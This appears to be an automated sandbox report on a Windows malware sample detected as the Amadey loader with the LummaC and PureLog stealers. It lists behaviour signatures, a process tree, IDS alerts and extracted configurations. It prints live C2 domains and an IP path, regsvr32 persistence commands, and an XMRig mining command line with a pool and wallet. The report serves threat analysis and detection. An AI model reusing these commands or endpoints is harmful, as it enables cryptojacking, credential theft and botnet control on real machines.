Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mc3FDUMnVz.exe

Overview

General Information

Sample name:Mc3FDUMnVz.exe
renamed because original name is a hash value
Original sample name:dfe7e5e8ff97c65bc0cb46b7a2aab1fd.exe
Analysis ID:1611334
MD5:dfe7e5e8ff97c65bc0cb46b7a2aab1fd
SHA1:b98189cb3246b0fc21eb99e67c43ab09e417bca1
SHA256:cd2e6080612c7e1cc99b1fae83f25867ddbd350cfd07c96001723d51554d672b
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Detected Stratum mining protocol
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Mc3FDUMnVz.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Mc3FDUMnVz.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)
    • skotes.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)
  • skotes.exe (PID: 7560 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)
  • skotes.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)
    • Fe36XBk.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe" MD5: B1209205D9A5AF39794BDD27E98134EF)
    • kUHbhqh.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe" MD5: F3B99592F40E424A2FB51E8F60B98077)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 4316 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • PING.EXE (PID: 3968 cmdline: ping -n 5 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
        • Stamp_Setup.exe (PID: 2728 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: EDD03FA3225E40CA97884CF91EC1DF79)
          • Stamp_Setup.tmp (PID: 4108 cmdline: "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: 639207875E87BFD011BFF971435A47DE)
            • Stamp_Setup.exe (PID: 3636 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: EDD03FA3225E40CA97884CF91EC1DF79)
              • Stamp_Setup.tmp (PID: 4860 cmdline: "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: 639207875E87BFD011BFF971435A47DE)
                • regsvr32.exe (PID: 4248 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
                  • regsvr32.exe (PID: 2720 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                    • powershell.exe (PID: 528 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 5960 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 5644 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • AddInProcess.exe (PID: 6936 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
                    • AddInProcess.exe (PID: 7876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
    • Ryu8yUx.exe (PID: 7512 cmdline: "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)
      • Ryu8yUx.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)
      • WerFault.exe (PID: 3892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • regsvr32.exe (PID: 6216 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 7008 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000003.00000002.1404710450.0000000000121000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000000.00000002.1374297259.0000000000941000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 6 entries
                    SourceRuleDescriptionAuthorStrings
                    13.2.Ryu8yUx.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      12.0.Ryu8yUx.exe.ff0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        12.2.Ryu8yUx.exe.45b9550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          3.2.skotes.exe.120000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            0.2.Mc3FDUMnVz.exe.940000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 6 entries

                              Bitcoin Miner

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6936, ProcessName: AddInProcess.exe

                              System Summary

                              barindex
                              Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe
                              Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DesusertionIp: 93.88.203.169, DesusertionIsIpv6: false, DesusertionPort: 39001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 2720, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 51758
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp, ParentProcessId: 4860, ParentProcessName: Stamp_Setup.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ProcessId: 4248, ProcessName: regsvr32.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:52:57.650755+010020403532Crypto Currency Mining Activity Detected192.168.2.9492811.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:36.809586+010020283713Unknown Traffic192.168.2.951681188.114.96.3443TCP
                              2025-02-10T19:50:37.596134+010020283713Unknown Traffic192.168.2.951682188.114.96.3443TCP
                              2025-02-10T19:50:39.367473+010020283713Unknown Traffic192.168.2.951685188.114.96.3443TCP
                              2025-02-10T19:50:40.373541+010020283713Unknown Traffic192.168.2.951689188.114.96.3443TCP
                              2025-02-10T19:50:41.664734+010020283713Unknown Traffic192.168.2.951690188.114.96.3443TCP
                              2025-02-10T19:50:42.888914+010020283713Unknown Traffic192.168.2.951692188.114.96.3443TCP
                              2025-02-10T19:50:44.513208+010020283713Unknown Traffic192.168.2.951694188.114.96.3443TCP
                              2025-02-10T19:50:46.991330+010020283713Unknown Traffic192.168.2.951698188.114.96.3443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:35.244428+010020355951Domain Observed Used for C2 Detected93.88.203.16956001192.168.2.951679TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:36.988025+010020546531A Network Trojan was detected192.168.2.951681188.114.96.3443TCP
                              2025-02-10T19:50:38.158818+010020546531A Network Trojan was detected192.168.2.951682188.114.96.3443TCP
                              2025-02-10T19:50:47.488464+010020546531A Network Trojan was detected192.168.2.951698188.114.96.3443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:36.988025+010020498361A Network Trojan was detected192.168.2.951681188.114.96.3443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:38.158818+010020498121A Network Trojan was detected192.168.2.951682188.114.96.3443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:14.029231+010020446961A Network Trojan was detected192.168.2.951669185.215.113.4380TCP
                              2025-02-10T19:50:18.852284+010020446961A Network Trojan was detected192.168.2.951671185.215.113.4380TCP
                              2025-02-10T19:50:38.159086+010020446961A Network Trojan was detected192.168.2.951683185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:44.517672+010020480941Malware Command and Control Activity Detected192.168.2.951694188.114.96.3443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:52:57.802949+010028269302Crypto Currency Mining Activity Detected192.168.2.951780162.19.139.1842222TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:05.699988+010028561471A Network Trojan was detected192.168.2.951665185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:13.270987+010028561221A Network Trojan was detected185.215.113.4380192.168.2.951666TCP
                              2025-02-10T19:50:37.193584+010028561221A Network Trojan was detected185.215.113.4380192.168.2.951677TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:08.898907+010028033053Unknown Traffic192.168.2.951667185.215.113.9780TCP
                              2025-02-10T19:50:14.765687+010028033053Unknown Traffic192.168.2.951670185.215.113.9780TCP
                              2025-02-10T19:50:34.379100+010028033053Unknown Traffic192.168.2.951678185.215.113.9780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-02-10T19:50:44.517672+010028438641A Network Trojan was detected192.168.2.951694188.114.96.3443TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Mc3FDUMnVz.exeAvira: detected
                              Source: https://modernakdventure.cyou/3MAvira URL Cloud: Label: malware
                              Source: https://modernakdventure.cyou/apiAvira URL Cloud: Label: malware
                              Source: https://modernakdventure.cyou/Avira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exeReversingLabs: Detection: 34%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeReversingLabs: Detection: 21%
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeReversingLabs: Detection: 34%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 57%
                              Source: Mc3FDUMnVz.exeVirustotal: Detection: 46%Perma Link
                              Source: Mc3FDUMnVz.exeReversingLabs: Detection: 57%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exeJoe Sandbox ML: detected
                              Source: Mc3FDUMnVz.exeJoe Sandbox ML: detected
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: importenptoc.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: voicesharped.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: inputrreparnt.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: torpdidebar.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: rebeldettern.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: actiothreaz.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: garulouscuto.com
                              Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString decryptor: breedertremnd.com
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: 185.215.113.43
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: /Zu7JuNko/index.php
